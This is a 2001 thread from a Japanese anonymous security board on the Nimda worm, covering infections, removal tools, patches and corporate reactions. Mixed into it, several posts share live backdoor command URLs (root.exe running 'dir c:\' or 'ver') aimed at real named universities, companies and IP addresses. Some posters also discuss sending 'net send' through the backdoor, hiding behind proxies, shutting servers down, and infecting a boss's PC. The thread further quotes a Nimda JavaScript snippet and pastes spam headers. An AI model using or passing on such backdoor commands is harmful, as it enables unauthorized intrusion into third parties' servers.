NGNGもしかしてにむだ+バックドアサイトで表紙だけ無くなってるのって、親切な人が分かるように削除してあげたとか?(^^;
0387名無しさん@お腹いっぱい。
NGNG個人情報ぱくっちゃマズイって・・・
0388名無しさん@お腹いっぱい。
NGNGこの場合、晒してるほうが悪いんじゃないか?
380がバックドア仕掛けたんなら別だけど。
0389名無しさん@お腹いっぱい。
NGNGでも事実上サーバを完全にコントロール出来るからな・・・
0390名無しさん@お腹いっぱい。
NGNGnet%20send%20localhost
↓
net%20send%20*
↓
(゚д゚)ウマー?
0391385
NGNG君過激♪
0392名無しさん@お腹いっぱい。
NGNGやったおいらのIPは感染サーバーのログに残るよなぁ?
0393名無しさん@お腹いっぱい。
NGNG串使ったら?
0394名無しさん@お腹いっぱい。
NGNG了解(^^;
0395名無しさん@お腹いっぱい。
NGNGhttp://www1.fl.kansai-u.ac.jp/scripts/root.exe?/c%20dir%20c:\
0396名無しさんをお腹いっぱい。
NGNG「SP2をインストールするために、念のために一旦ウィルス対策ソフトを止めます。」
と言うのに対して
「ウィルス対策ソフトを止めたら、その間にウィルスに感染するかもしれへんやん。
そんなことになったら、あんたが責任を取ってくれるんか」
仕方が無いから、セットしに行きますということで行ったら、タコのパソコンに入っているのが
ウィルスバスター97。「?」という顔をしていると、「ああ、それ。知り合いにもろてん(もらったんだよ)」
「これじゃ意味無いですよ。新しいのを買ってください」と言うと、「ええ〜?買うん?
あんた、そういうのの新しいの持ってないん?持ってきて入れてくれんか?」
以降はほとんど無視して、ニムダウィルスチェックして(奇跡的にも?かかって
いなかった。っていうかIE4だったし)IE5.5SP2入れて、「問題なし」と言って
帰ってきてしまったんだけど・・(VBはパチもん97のまんま)
おんなじような個人ユーザーって結構居るんだろうな・・・
0397名無しさん@お腹いっぱい。
NGNG>タコのパソコンに入っているのが
ウィルスバスター97
(w
0398396
NGNG>>タコのパソコンに入っているのが
>>ウィルスバスター97
>(w
本当なんですよ。なんかよそで使わなくなったのをもらってきて
入れたんだとか。部下に聞いたら、
くれた人からも「こんなん入れても意味無いよ」とか言われてたらしいんだけど(笑)
0399名無しさん@お腹いっぱい。
NGNG>ウィルスバスター97
最新版持ってても、アップデートの仕方を知らないやつも沢山居るよ(笑)
0400397
NGNG0401名無しさん@お腹いっぱい。
NGNG> ニムダウィルスチェックして(奇跡的にも?かかって
> いなかった。っていうかIE4だったし)
バックドアは大丈夫ですか?
ここの過去ログに、ニムダウィルスチェック・駆除だけしてバックドア健在というようなサイトが報告されているので・・。
0402名無しさん@お腹いっぱい。
NGNGタコ社長(失礼)からアイラブユーメールは来なかったかい?(ワラ
0403名無しさん@お腹いっぱい。
NGNGクライアントにバックドアは無いだろ?
0404402
NGNG0405名無しさん@お腹いっぱい。
NGNGタコ社長は97年にパソコン初めて触って楽しかったんだろうねー。
0406名無しさん@お腹いっぱい。
NGNGnot Foundおめ。
0407名無しさん@お腹いっぱい。
NGNG私のIEはだいぶ前からSP2にしてあったので大丈夫だと思っていました。
しかし今日新しくNorton AntiVirus2001入れてスキャンしたらいきなり
C:\WINDOWS\Temporary Internet Files\Content.IE5\に
readme.eml が見つかったのでひとまずノートンで消しました。
あわてて↓ここで見たとおり駆除ツールをやってみたのですが、
http://www.symantec.com/region/jp/sarcj/data/w/w32.nimda.a%40mm.removal.tool.html
このツールでは駆除できないと言われます。
しかもこのとき作られるログを見てください。
-----------------------------------------------------------------------
The file "d:\program files\katjusha2102\log\ton.2ch.net\sec\1000870301.dat"
is dropped by W32.Nimda.A@mm. The tool could not delete this file.
The file "d:\program files\katjusha2102\log\news.2ch.net\news\1000861682.dat"
is dropped by W32.Nimda.A@mm. The tool could not delete this file.
The W32.Nimda.A@mm removal was unsuccessful.
Here is the report:
The total number of the scanned files: 45207
The number of deleted files: 0
The number of repaired files: 0
The number of viral processes terminated: 0
The tool could not delete 2 W32.Nimda.A@mm files from your PC,
Please contact Technical Support for assistance.
-----------------------------------------------------------------------
かちゅ〜しゃをd:\program files\に入れて使っていますが
かちゅ〜しゃのログにNimdaがいるといってます。
そんなことありえるのでしょうか?
0408(´∀` )
NGNGいや、くれた奴が実はソシャルのスキル持ってて、敢えて旧いバージョン
呉れたんだよ。社長が平気で入れるのを見越して。。。
今ごろそいつ、Sub7のサーバー.exeカスタマイズしてるところだよキト(w
0409名無しさん@お腹いっぱい。
NGNGレスに書かれているHTMLのコード>>336などを検出してるんじゃないでしょうか。
で、そのツールの但し書きによれば
>感染している.eml、.nws、.doc、.txtファイルは削除します。
>上記4つの拡張子以外の拡張子を持っている.emlファイルは、このツールでは削除されません。
ということで消せなかった、とレポートされたのだと思います。
0410名無しさん@お腹いっぱい。
NGNGノートンって、本体のreadme.emlと感染html関係の上書きスクリプト部分
同じ名前で検出するのかな。そうだとしたらチョとややこしい。
バスターだと接頭がPEとJSで区別されてるからすぐわかるけど。
・・・あんま関係無いレスサゲ。
0411名無しさん@お腹いっぱい。
NGNGwavの表示を高速にするためにリンク先先読みするソフトで、リンク先の鯖が感染してて
開いてもいないのにこちらも感染なんてありえますか?
(ソフトにもよるでしょうけど)
0412名無しさん@お腹いっぱい。
NGNGWav? Web??
0413名無しさん@お腹いっぱい。
NGNGストリームする時のバッファリングの事かな。。。。
・・と敢えて訳解らん方向に持っていって見る(w
0414名無しさん@お腹いっぱい。
NGNGいちおログを消したら
The W32.Nimda.A@mm has not been found on your computer.
がでてきて安心しました。
この駆除ツールも適当っすねぇ。
0415名無しさん@お腹いっぱい。
NGNGあっ、ノートンでは2chのログ検出されないっすよ。
駆除ツールでスキャンかけると引っかかります。
0416名無しさん@お腹いっぱい。
NGNGこんなの見つけた(笑)
0418名無しさん@お腹いっぱい。
NGNGまあ、ありかもね。
0419名無しさん@お腹いっぱい。
NGNG>>334
これは実のところどうなの?
0420名無しさん@お腹いっぱい。
NGNG作者の言うとおりデザインはいまいちだね。
でもいいんじゃないか。
0421名無しさん@お腹いっぱい。
NGNGなんて言う爺ちゃんには
「うん、ムリンが入ってるんだよ」と答えてやった方がいい。
そんな感じのページだね>>416
0422名無しさん@お腹いっぱい。
NGNG何人かがやってくれたみたいだけど、とりあえず閉めたのかな?
http://www.takara-univ.ac.jp/
http://www.takara-univ.ac.jp/scripts/root.exe?/c%20dir%20c:\
0423名無しさん@お腹いっぱい
NGNGねすけ6.1で煮無駄サイトにアクセスすると・・
ダウンロード警告がでます
ダウンロードするとemlファイルがダウンロードされます。
IE5.XがSp2になっていないと・・ダウンロードしたファイルをエクスプローラ等でクリックすると感染します
0424名無しさん@お腹いっぱい。
NGNG1.Admin.dllに感染したサイトも、メールをばりばり送るんでしょうか?
2.IEで感染したパソコンも、他のIISサーバーを攻撃に行くんでしょうか?
0425名無しさん@お腹いっぱい。
NGNG海外のトレンドマイクロのサイトからパターンファイルをダウンロードして
ファイルにコピーペーストしたら、使いつづけられませんか?
0426名無しさん@お腹いっぱい。
NGNGポートを変えたは良いが・・・・
0427名無しさん@お腹いっぱい。
NGNGどこ?バックドアがあるなら串経由でシャットダウンしてやるよ! σ(^-^;;
0428対策済
NGNGhttp://61.113.0.130/
http://61.113.33.218/
http://www.ucar-tky.or.jp/mokuji.htm
0429&&
NGNG0430&&
NGNG会社案内ぐらいしか載せてない企業が自前サーバ自営ドメインで
Webサイト開く意義って何かあるの。
危険おかしてまで。。
0431名無しさん@お腹いっぱい。
NGNGサンマイクロシステムズやらIBMやらの陰謀です(爆)
eコマースってなに?
0432名無しさん@お腹いっぱい
NGNGメールサーバとしてつかうつもりでアブライアンスサーバかったら
Webサーバ機能もまけでついてかからとか・・
0433&&
NGNGサンマイクロシステムズやらIBMやらにもあるな。
0434名無しさん@お腹いっぱい。
NGNG明日の朝、日本のニムダ報告件数が一気にふえるぞ。
http://wtc.trendmicro.com/wtc/
04351
NGNG0436名無しさん@お腹いっぱい。
NGNGview-source:http://members.tripod.co.jp/bingo852/
何?これ。
0437ボソッ
NGNG0438名無しさん@お腹いっぱい。
NGNGそのエロサイト飽きたよ。何度もコピペするなんて厨房丸出しだな
0439名無しさん@お腹いっぱい。
NGNGハングルは分からんし(w
0440名無しさん@お腹いっぱい。
NGNG□□
□□ ■■■■■■
□□■■■■■■■■■■
□■■■■■■■■■■■■■
■■■■■■■■■■■■■■■■■
■■■■■■■■■■■■■■■
■■ Zzz... ■■
■■ ∧∧ ■■
■■ Zzz. (- - )⌒⌒⊇? ■■
■■ ~~~~~~~~~~~~~~~~ ■■
■■■■■■■■■■■■■■■
■■■■■■■■■■■■■■■
0441名無しさん@お腹いっぱい。
NGNG・・・・・・・
0442名無しさん@お腹いっぱい。
NGNG0443名無しさん@お腹いっぱい。
NGNGここも閉鎖中
0444
NGNG「HPを見るだけで感染することなど有り得ない」
と断言しちゃったんで、事実上対策禁止状態・・・。
0445名無しさん@お腹いっぱい。
NGNGそいつのPCに感染させてやるのだ。報告きぼーん。
0446名無しさん@お腹いっぱい。
NGNGIE経由で感染したwin9X系のPCもIIS攻撃するんでしょうか?
0447
NGNG誰か感染したら全社道連れですがな・・・。
0448
NGNGしない。W2KでIIS入ってればするけど。
つうか、なんでIIS攻撃だけ気にする?
0449
NGNG1)IE5.1ーSP2,IE5.5ーSP2,IE6+OE6
のいずれかのバージョンにしておく。
2)IEのセキュリティーレベルを中以上にする。
3)readme.exeの警告が出たらキャンセルする。
やっておいた方がいい対策
1)メディアプレイヤーをインストールしておく。
2)Javaのアクティブスクリプトを切る
で合ってる?
0450446
NGNG攻撃元がwin9XやmeのPCからの直接攻撃も含まれるの
だったらこのアタックの多さも説明できるかと
まがりなりにもIISでサーバたててるのに対策してない人がこんなに
多いなんて自分には信じられません
0451対策済
NGNGSubject : Re: Make Unlimited Phone Calls for $69.95/month! CODE:7777
Date : Mon, 24 Sep 2001 12:58:00 -0400
Received: from [203.228.117.254] by hotmail.com (3.2) with ESMTP id MHotMail***
From ittinfo100@excite.com Mon, 24 Sep 2001 09:57:49 -0700
X-Sender: ittinfo100@excite.com
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1
X-Priority: 3
X-MSMail-Priority: Normal
ittremove@excite.com
From : Luigi@getfreepizza.com
Subject : FREE Pizza Hut pizza for a year !!
Date : Fri, 21 Sep 2001 17:54:25 -0600
MIME-Version: 1.0
Received: from [139.142.205.227] by hotmail.com (3.2) with ESMTP id MHotMail***
Received: from playsic-en4q0ov (localhost) by mail2.playsic.com (LSMTP for Windows NT v1.1b) with SMTP id <11.0000002F@mail2.playsic.com>; Fri, 21 Sep 2001 18:01:56 -0600
From owner-nolist-testbounce Sat, 22 Sep 2001 00:38:14 -0700
From : PUNTOG.NET < correono@puntog.net >
Subject : World Trade Center + 400 fotos, videos, etc. --> Noticias PUNTOG.NET - 22.09.2001 - SOMOS de 15.000.-
Date : Mon, 24 Sep 2001 21:10:00 +0200
MIME-Version: 1.0
Received: from [195.53.204.158] by hotmail.com (3.2) with ESMTP id MHotMail***
Received: from localhost ([217.126.109.143]) by infonegocio.com with Microsoft SMTPSVC(5.5.1877.507.50); Mon, 24 Sep 2001 00:17:32 +0200
From correono@puntog.net Sun, 23 Sep 2001 15:21:55 -0700
X-Sender: correono@puntog.net
Organization: www.puntog.net
Return-Path: correono@puntog.net
Message-ID: < 06d2e3217221791SMTPOP140@infonegocio.com >
0452名無しさん@お腹いっぱい。
NGNG>2)Javaのアクティブスクリプトを切る
頼むからこういう訳の解からん事は書かんでクレ…
0453
NGNGちがってた?javaスクリプト関係無し?
0454名無しさん@お腹いっぱい。
NGNGJAVAアプレットと区別するため
アクティブスクリプトと表示されているが?
0456名無しさん@お腹いっぱい。
NGNG0457
NGNGJavaスクリプトのopenwindow()を実行されないようには
できないんでしょうか?
0458名無しさん@お腹いっぱい。
NGNG0459名無しさん@お腹いっぱい。
NGNG>ウチの会社、偉い人が
> 「HPを見るだけで感染することなど有り得ない」
> と断言しちゃったんで、事実上対策禁止状態・・・。
会社サイトで堂々とニムダ垂れ流してるのはこういうところか・・。
たしかにニムダ、しなやかにニムダ、先進のネットワーク企業
http://www.d-link.co.jp/
ニムダダウンロードサービス実施中
弊社は「HPを見るだけで感染することなど有り得ない」と信じて三連休も思いっきり休んじゃいました。
0460
NGNG>IE経由で感染したwin9X系のPCもIIS攻撃するんでしょうか?
>>448
>しない。W2KでIIS入ってればするけど。
すまん。これの情報源がどこにあるのか教えて。
下のページじゃ Nimda が IIS のバックドア探すために
get request を送るタイミングについては触れられてないんだけど・・・
http://a500.g.akamai.net/7/1776/484/00002/inet.trendmicro.co.jp/solutionfile/3059NIMDAINF.htm
0461名無しさん@お腹いっぱい。
NGNGhttp://139.142.205.227/scripts/root.exe?/c%20dir%20c:\
こういうのって対策済み??
0462名無しさん@お腹いっぱい。
NGNG前スレ900の対策はどうよ?
http://ton.2ch.net/test/read.cgi/sec/1000973617/900
0463d-link.co.jp
NGNG東京めたりっく通信
http://www.metallic.co.jp/
新種ワーム「Nimda」感染に関するご注意
http://www.metallic.co.jp/topics/2001/0919.html
0464名無しさん@お腹いっぱい。
NGNG>Nimda感染サイトのwww.d-link.co.jpの上位回線はxdsl.ne.jpだから東京めたりっく通信だな。
あ( ̄△ ̄;
トップページのhtmlファイルだけ削除だよ。
バックドアよりすごくない?(^^;
www.d-link.co.jp
0465名無しさん@お腹いっぱい。
NGNG0466名無しさん@お腹いっぱい。
NGNGまだ相変わらず見えてるよ...
厨房の俺でもハッカーになれてしまう
W2k鯖は糞だね...
0467名無しさん@お腹いっぱい。
NGNGチェック速いですね(^^;
相変わらずというより、ここ、昨夜夜半閉じていました。
昨夜とファイル構成が変わっているので一応駆除かなにかしたみたいです。
おそらくニムダ対策はしたみたいなんだけど、バックドアはそのままのようで・・。
あと、ここはw2kじゃないみたいです。
http://www.takara-univ.ac.jp/scripts/root.exe?/c%20ver
0468名無しさん@お腹いっぱい。
NGNGNimda様ありがとう!
0469名無しさん@お腹いっぱい。
NGNGucspi-tcp-0.88.tar.gz
・・・何で、tarボール有るの?
ってーか、デュアルにしてlinuxに移行するつもりかな、取り合えず(w
コレでフィルタかけれるのかな。。。NT
0470名無しさん@お腹いっぱい。
NGNGmentai みてたらreadダウンロードダイアログが出たんだけど。
関係ない?ちなみに情報シス板見てた時。
勘違いだったらすまん
0471名無しさん@お腹いっぱい。
NGNGあせるよね。
俺もホットゾヌのログで引っかかったので。
0472名無しさん@お腹いっぱい。
NGNGmentai見てた時?
0473名無しさん@お腹いっぱい。
NGNGとりあえず平気だけど・・。
http://mentai.2ch.net/test/read.cgi?bbs=infosys&key=1001349144&ls=100
あなた自身が感染していて、キャッシュにニムダJavaScriptがカキコされてるとか・・。
もしかして2ch専用ブラウザのどれかとか使ってませんか?
0474名無しさん@お腹いっぱい。
NGNGこの様子ではニムダごとlinuxに展開されることになると思われ。
0475名無しさん@お腹いっぱい。
NGNGいや、普通のIE5.5 SP2
騒がれてしばらくしてからSP当てた。
ちなみにSP当ててからIMEが遅くなり .htm(tar圧縮)も見れなくなった。
気にしてなかったけど、もしかして漏れ感染されてるのかな?w 笑いどころじゃないか・・・・・
0476名無しさん@お腹いっぱい。
NGNG0477名無しさん@お腹いっぱい。
NGNGとりあえずこれか?
トレンドマイクロ ・ ウイルス バスター オン ライン スキャン
http://www.trendmicro.co.jp/hcall/scan.htm
0478名無しさん@お腹いっぱい。
NGNG>>>429
>
> 明日の朝、日本のニムダ報告件数が一気にふえるぞ。
>
> http://wtc.trendmicro.com/wtc/
増えてるよ(´Д`)
0479名無しさん@お腹いっぱい。
NGNGありがと。ただ今チェック中。
いや、感染してた・・・・・・・・・・
とりあえず本当にありがとう。
0480名無しさん@お腹いっぱい。
NGNGちなみにこれ
http://inet.trendmicro.co.jp/virusinfo/isp/default3.asp?VName=JS_NIMDA.A
0481www.soai.ac.jp
NGNG0482名無しさん@お腹いっぱい。
NGNGそれだけなら、感染してないんじゃない?
0483名無しさん@お腹いっぱい。
NGNG女子短大の学生さんがにちゃんなんかみてちゃダメだよ(w
0484名無しさん@お腹いっぱい。
NGNGどうやら感染はしてないみたい。
プルトニウムの解説ページのキャッシュがウイルスチェックに引っかかったみたい。
いった記憶無いなあ・・・・・・2chでリンク張られてたのだろうか?
<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html>
でも、なんでmentaiからread.exeダウンロードダイアログが出たんだろ?
とりあえずお騒がせいたしました。ありがとうございました。
0485名無しさん@お腹いっぱい。
NGNGセキュ板に春の予感・・・
0486名無しさん@お腹いっぱい。
NGNG業者の人間が、学校へ行って接続しただけじゃ!(w
>>478
http://wtc.trendmicro.com/wtc/
すげぇ〜韓国、中国、ロシアでは一件の報告例もないぞ!(w
0487名無しさん@お腹いっぱい。
NGNG> >>478
> http://wtc.trendmicro.com/wtc/
> すげぇ〜韓国、中国、ロシアでは一件の報告例もないぞ!(w
ワレ大国では、バスター持っててもキーが送られてこないから、ニムダのひっかかるバージョンがまだないのよ(w
0488N374
NGNGぢつは、、、、韓国、中国、ロシア共同で今回のnimdaコンセプトウイルス開発
してたのさ。
だから、事前情報持っててパッチは適用済み。
俺の脳みそカーニボーがキャッチした情報だ。
0489迷子の子猫
NGNG2ch専用ブラウザってIEの部品使ってるんですよね。
IE5.5 SP2だったら大丈夫ですよね?
私かちゅ使用なんですけど・・・
0490名無しさん@お腹いっぱい。
NGNGグラフのニムダ収束の仕方が気になる。
いくら何でも発生以前の状態にこんなに早くなる物か?
0491<`∀´>ニムダ!!
NGNGうそーん
0492名無しさん@お腹いっぱい。
NGNGDaily Summary Report のグラフのことを言っているのだろうが、最終日
の値は、0に固定されているから収束しているように見えるが、実際の値
は9/23日の値を最後としてグラフをみるべし。
一応、数量的には収束に向かっていると評価してもよいだろうが、発生前
の水準に戻ったなんてことはないね。
0493名無しさん@お腹いっぱい。
NGNGええっと、ログの保存形式の関係で、キャッシュなどがあるスキャンソフトではひっかかり、あるものでは引っかからないと、ここの過去ログで読んだ気がしたので書いてみましたm(_ _)m
0494名無しさん@お腹いっぱい。
NGNG>最終日の値は、0に固定されているから収束しているように見えるが
そうだったんだ。変だとオモッタヨ。
リンク間違ってた。グラフはこっち。
http://wtc.trendmicro.com/wtc/report.html
0495名無しさん@お腹いっぱい。
NGNG>ぢつは、、、、韓国、中国、ロシア共同で今回のnimdaコンセプトウイルス開発
してたのさ。
>だから、事前情報持っててパッチは適用済み。
そんなこたぁない(w
「中国一号」,100万人に感染か──人民日報
http://www.zdnet.co.jp/news/bursts/0109/21/people.html
0496名無しさん@お腹いっぱい。
NGNGCodeRedの方がひどいね。
Nimdaを駆除したからって安心してる人も多い。
0497名無しさん@お腹いっぱい。
NGNGhttp://www.d-link.co.jp/
0498名無しさん@お腹いっぱい。
NGNGここはおとといまでニムダサイトだったんだけど、しらんぷり。ひどくない?
http://www.with9.com/
0499名無しさん@お腹いっぱい。
NGNGひどいねぇ・・・・。
http://210.12.157.160/scripts/root.exe?/c%20dir%20c:\
050012ch
NGNG0501迷子の子猫
NGNGレスありがとうございます。
だけど意味がわからない私って・・・(ニガワラ
いろんなスレを読んでみて、大丈夫だとは思っていたんですが
>>473さんの
>あなた自身が感染していて、キャッシュにニムダJavaScriptがカキコされてるとか・・。
>もしかして2ch専用ブラウザのどれかとか使ってませんか?
発言を読んで専用ブラウザは感染の恐れがあるってこと?
と思ったもので。ここ、セキュ板だし・・・。
0502名無しさん@お腹いっぱい。
NGNG>新種のコンピューターウイルス「W32.Vote.A@mm」が登場し、ウイルス対
これが何か?
ウイルス名: TROJ_VOTE.A
http://www.trendmicro.co.jp/virusinfo/default3.asp?VName=TROJ%5FVOTE%2EA
ニムダ対応パターンで検知可能だそうな。
ちがってたらフォローくれ。
0503>
NGNGたち上げ時に業者に設定させて
あとは日常は管理してないのかな
0504名無しさん@お腹いっぱい。
NGNGって、今日になってのーとん先生、アップデート出してるやん(@@〜☆
0505名無しさん@お腹いっぱい。
NGNGういるすばすたーもでてるやん(@@〜☆
摩訶ふぃーはどうよ?
0506名無しさん@お腹いっぱい。
NGNG表紙が無くなっていると思ったのに、またこんな・・。
http://www.maruko-j.co.jp/scripts/root.exe?/c%20dir%20c:\
0507名無しさん@お腹いっぱい。
NGNG共有かけてあったホルダにdesktop.emlが出来てたけどそれ以外は
被害は無い様なんですけど。
0508名無しさん
NGNGhttp://www.maruko-j.co.jp/WebBBS/info.html
(注: readme.emlはありません)
0509名無しさん
NGNG0510>
NGNGまかちゃんも対応済み
http://www.nai.com/japan/virusinfo/virV.asp?v=W32/Vote@MM
0511-
NGNGhttp://members.tripod.co.jp/bingo852/
0512名無しさん@お腹いっぱい。
NGNGhttp://www.yomiuri.co.jp/bitbybit/bbb07/192501.htm
0513名無しさん@お腹いっぱい。
NGNG0514名無しさん@お腹いっぱい。
NGNGまあ、ここは旧に復してもどうせすぐroot.exeが挿入されるだろう(w
0515名無しさん@お腹いっぱい。
NGNGソコの記事読んで思った。今回慌ててSP当てた人が大半だと思うけど、個別のパッチ当ててく
方が更に重要だと思う。今後的に。
そりゃ、SP自体週1で更新されてれば良いけど(w
0516名無しさん@お腹いっぱい。
NGNG| 佐藤慶浩シニアセキュリティコンサルタントは、「例えば一般ユーザー向けに
| ボタン1つで簡単、迅速にソフトを最新版に更新できる機能をIEにつけるべきだ」
| と指摘する。ユーザー自身がパソコンを守るという意識を高める必要があるが、
| マイクロソフトにも、確実に伝わる分かりやすい情報提供が求められよう。
うーん、これってWindowsUpdateではないのだろうか…
日本ネットワークセキュリティ協会理事はWindowsUpdateを知らないのだろうか、
それともWindowsUpdateではまずいなら、それ欠点もちゃんと説明すべきではないだろうか…
WindowsUpdateは怖い、SPを当てると動かなくなることがあるからいやだ、
HotFixは面倒…
あーもうこういう自分勝手な輩にはいいかげんうんざりだよ。
0517名無しさん@お腹いっぱい。
NGNG>読売新聞に「ニムダ感染拡大」の記事が
> http://www.yomiuri.co.jp/bitbybit/bbb07/192501.htm
◆セキュリティーに無関心な利用者
どちらかというと今回の場合、利用者というより管理者のような・・。
0518名無しさん@お腹いっぱい。
NGNGたぶん、キーボードに「WindowsUpdateキー」をつけたらイイ!
とか思ってるんでない?
F1キーに「ヘルプ」とか、キーの機能を表すテプラを貼ってる人もいるくらいだしね。
0519名無しさん@お腹いっぱい。
NGNG>ユーザー自身がパソコンを守るという意識を高める必要があるが、
・・・ボタン一つでやらせて、コレ身につくの?(w
穴放置させとくよりは良いか。
あんまり、揚げ足鳥は良くないけど。。言いたくも成るよね。>516
0520弊社では
NGNGついに弊社では、「ウィルス被害を防止するため、インターネット・エクスプローラおよび Outlookの使用を平成14年3月末まで禁止する。」という通達が出ました。(><)
0521名無しさん@お腹いっぱい。
NGNG肝心なバックドアからの感染には全く触れてないね…
0522名無しさん@お腹いっぱい。
NGNG・・・・ネタでなく??
ご愁傷様・・・
0523知り合いの会社は
NGNG0524名無しさん@お腹いっぱい。
NGNGきっとそのキーからすり減るね(^^;
どこかで見た Ctrl+Alt+Del だけのキーボード(w に通ずるものがある(^^;
これからはF5キー連打ではなくWindowsUpdateキー連打でMSにDDos攻撃だ!(w
0525名無しさん@お腹いっぱい。
NGNG現状調査と対策済むまでは、仕方ないね。
0526名無しさん@お腹いっぱい。
NGNGhttp://www.d-link.co.jp/
0527名無しさん@お腹いっぱい。
NGNGついでにWindowsもやめてMacかLinuxにでもするとよいねぇ。
もちろんWordやExcelのマクロも危険ですから一太郎とLotus1-2-3に決まりだね。
ったく、IEやOutlookを禁止する通達が出せるなら、なぜIEのSP2をあて、Outlook
にもSR2をあてる通達が出せないんだか。
きっと脳みそのbit数が足りないんだろうね。
0528名無しさん@お腹いっぱい。
NGNGいろんな対応があるものだ。
こうなるとパソコンの使用禁止ってのもどっかにあるんだろうな。
0529名無しさん@お腹いっぱい。
NGNGソースみて二度びっくり(@@〜☆
0530名無しさん@お腹いっぱい。
NGNGやけっぱちでワードでHTML作ったな。
0531名無しさん@お腹いっぱい。
NGNG伝聞だが某大学の学生向けパソコンスペースは当面閉鎖になったらしい。就職活動はどうするんだ?
0532名無しさん@お腹いっぱい。
NGNG未だに一太郎4使ってるとこもあるし…
0533名無しさん@お腹いっぱい。
NGNGしかし、ここは近日中に再感染するとみた・・・<先週以来の対応が泥縄
0534名無しさん@お腹いっぱい。
NGNGhttp://www.with9.com
これの影響か?
http://www.dolphinnetservice.ne.jp/component/bbs/bbs.asp
0535名無しさん@お腹いっぱい。
NGNG今月でCoderedIIは永眠するからその後フォーマットすればバックドアは塞がる。
「おおっ直ったじゃん」ってこんな対応でもいいのかな。
このサイト管理者。
0536名無しさん@お腹いっぱい。
NGNGその通達出したらITが対応でてんてこまいになるからだろ
パッチ出る度に「やり方がわかりません」なんて言われてITがいちいち対応しなくちゃならん。
それなら、いっそうのこと使用禁止にした方がまだまし。
だいたいIE、OEでなくちゃならん理由はないだろ。
0537名無しさん@お腹いっぱい。
NGNGそりゃないだろ
IEやOEの代わりはいくらでもあるがPCの代わりはない
0538対策済
NGNGSubject : Re: Make Unlimited Phone Calls for $69.95/month! CODE:7777
Date : Mon, 24 Sep 2001 12:58:00 -0400 Received: from [203.228.117.254] by hotmail.com (3.2) with ESMTP id MHotMail***
From ittinfo100@excite.com Mon, 24 Sep 2001 09:57:49 -0700
X-Sender: ittinfo100@excite.com
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1
X-Priority: 3
X-MSMail-Priority: Normal
ittremove@excite.com
From : Luigi@getfreepizza.com
Subject : FREE Pizza Hut pizza for a year !!
Date : Fri, 21 Sep 2001 17:54:25 -0600
MIME-Version: 1.0
Received: from [139.142.205.227] by hotmail.com (3.2) with ESMTP id MHotMail***
Received: from playsic-en4q0ov (localhost) by mail2.playsic.com (LSMTP for Windows NT v1.1b) with SMTP id <11.0000002F@mail2.playsic.com>; Fri, 21 Sep 2001 18:01:56 -0600
From owner-nolist-testbounce Sat, 22 Sep 2001 00:38:14 -0700
From : PUNTOG.NET < correono@puntog.net >
Subject : World Trade Center + 400 fotos, videos, etc. --> Noticias PUNTOG.NET - 22.09.2001 - SOMOS de 15.000.-
Date : Mon, 24 Sep 2001 21:10:00 +0200
MIME-Version: 1.0
Received: from [195.53.204.158] by hotmail.com (3.2) with ESMTP id MHotMail***
Received: from localhost ([217.126.109.143]) by infonegocio.com with Microsoft SMTPSVC(5.5.1877.507.50); Mon, 24 Sep 2001 00:17:32 +0200
From correono@puntog.net Sun, 23 Sep 2001 15:21:55 -0700
X-Sender: correono@puntog.net
Organization: www.puntog.net
Return-Path: correono@puntog.net
Message-ID: < 06d2e3217221791SMTPOP140@infonegocio.com >
0539名無しさん@お腹いっぱい。
NGNG0540名無しさん@お腹いっぱい。
NGNGフォーマットしたら当然パッチも消えてる事に管理者気づく事を祈ろう(w
0541W32.Vote.A@mm
NGNGスレ違いだが「アメリカとイスラムの戦争について調査してます。
投票してくださいね」みたいなメールと一緒にやってくるそうな。
それで「vote」らしい。
夕刊に載ってた。
モ、モ、漏れがいつばら撒いたって言うんだ!!!!
今俺はナー!真赤なかをしてぷるぷしながらきーぼど叩いてるんだぞ!!!!
0543名無しさん@お腹いっぱい。
NGNGありえんな。ニムダのまえにバックドア飼ってたんだから。
またおなじこと繰り返しておしまい。
0544名無しさん@お腹いっぱい。
NGNG感じたら元から使わないし、PC買う前にマカになっちまうよ(w
0545名無しさん@お腹いっぱい。
NGNGまあ、このテは日本でははやらんな。
0546名無しさん@お腹いっぱい。
NGNG>>>502
> それで「vote」らしい。
>
> 夕刊に載ってた。
これかな。
http://www.asahi.com/international/update/0925/014.html
米で「投票ウイルス」発見 軍事行動の是非問う形で侵入
ここだけやけに重いんだが。
話題性があるからだろうけど、ちょっと扱いが大げさな気もする。
0547名無しさん@お腹いっぱい。
NGNG0548名無しさん@お腹いっぱい。
NGNG宝塚造形芸術大学 短期大学部 見えたり閉めたり晒したり
http://www.takara-univ.ac.jp/
ここ4日くらい、昼間は感染サイト、夜は不通。
まさかWebサーバを朝起動して夜落してるのか?(w
0549名無しさん@お腹いっぱい。
NGNG株式会社シーエスディー
http://www.powerstage.com/default1.asp
ニムダ配布してニダの国行きプレゼントかい(^^;
ニダウイルス
∧∧
<`∀´>
≡
/\≡/\
│
05501
NGNGhttp://www.f2.dion.ne.jp/~impact14/
0551名無しさん@お腹いっぱい。
NGNGひまだねえ、あんた。
0552名無しさん@お腹いっぱい。
NGNG日本スベック株式会社
http://61.113.0.130
東京中販事務局宛
http://www.ucar-tky.or.jp/mokuji.htm
0553名無しさん@お腹いっぱい。
NGNG0554名無しさん@お腹いっぱい。
NGNG404とか400だから大丈夫って言う気はしてるんですが、
Sambaも使ってるんですね。それで、Sambaの共有フォルダに
ニムダ各種.emlが・・・。でも、LanにつながってるWindows
パソコン全てを検索・ウイルススキャンしたけど、感染してない
もよう。Sambaのニムダも全部消したけど、時間が経ったら
また現れた。これってやっぱしつながってるWindowsが感染してる
からですか?
0555名無しさん@お腹いっぱい。
NGNGありがとう。
探してたんだ。
0556名無しさん@お腹いっぱい。
NGNG近畿文化体系策定協議会内 実行委員会
http://www.bee.woodland.co.jp/test/kb-index.htm
再感染かも
0557名無しさん@お腹いっぱい。
NGNGオレも同じだよ。
だからApacehのポート番号換えた。
んで、LANを繋ぎなおしてローカルIPも変えた。
ドライブが共有にされるから「TROJ」系のファイルもある筈だよ。
0558名無しさん@お腹いっぱい。
NGNGまさか、NetBIOS系のポートが外から丸見え…ってことはないよね?
0559554
NGNGレスどうもです。つまりWinじゃなくてApacheが
直接やられていると・・・?Apacheだから安心
なんて思っていてはいけないのかなぁ・・・・。
0560名無しさん@お腹いっぱい。
NGNGログを見ればApacheには外部から感染しないのはわかりそうな物だが・・・
Apacheにreadme.emlと改変されたhtmlファイルがあるのは共有でウプされた物。
0561554
